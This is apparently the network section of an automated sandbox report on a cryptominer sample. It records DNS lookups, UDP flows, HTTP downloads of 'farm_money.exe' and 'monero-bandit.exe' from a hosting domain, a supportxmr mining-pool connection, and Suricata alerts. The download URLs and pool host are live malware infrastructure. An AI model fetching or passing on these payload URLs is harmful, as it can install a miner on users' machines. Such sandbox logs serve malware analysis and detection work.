Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| cx55566.tmweb.ru | 92.53.96.4 | |
| pool.supportxmr.com |
CNAME
pool-fr.supportxmr.com
|
37.187.95.110 |
- UDP Requests
-
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:61480 239.255.255.250:3702
-
192.168.56.101:62327 239.255.255.250:1900
-
192.168.56.101:62329 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://cx55566.tmweb.ru/farm_money.exe
REQUEST
RESPONSE
BODY
GET /farm_money.exe HTTP/1.1
Host: cx55566.tmweb.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 14 Oct 2021 08:22:12 GMT
Content-Type: application/octet-stream
Content-Length: 2038272
Last-Modified: Mon, 11 Oct 2021 22:43:11 GMT
Connection: keep-alive
ETag: "6164bdff-1f1a00"
Expires: Sun, 14 Nov 2021 08:22:12 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes
GET
200
http://cx55566.tmweb.ru/monero-bandit.exe
REQUEST
RESPONSE
BODY
GET /monero-bandit.exe HTTP/1.1
Host: cx55566.tmweb.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 14 Oct 2021 08:22:15 GMT
Content-Type: application/octet-stream
Content-Length: 2149888
Last-Modified: Mon, 11 Oct 2021 22:34:23 GMT
Connection: keep-alive
ETag: "6164bbef-20ce00"
Expires: Sun, 14 Nov 2021 08:22:15 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 92.53.96.4:80 -> 192.168.56.101:49207 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 92.53.96.4:80 -> 192.168.56.101:49207 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
| TCP 92.53.96.4:80 -> 192.168.56.101:49204 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 92.53.96.4:80 -> 192.168.56.101:49204 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
| TCP 192.168.56.101:49212 -> 91.121.140.167:5555 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts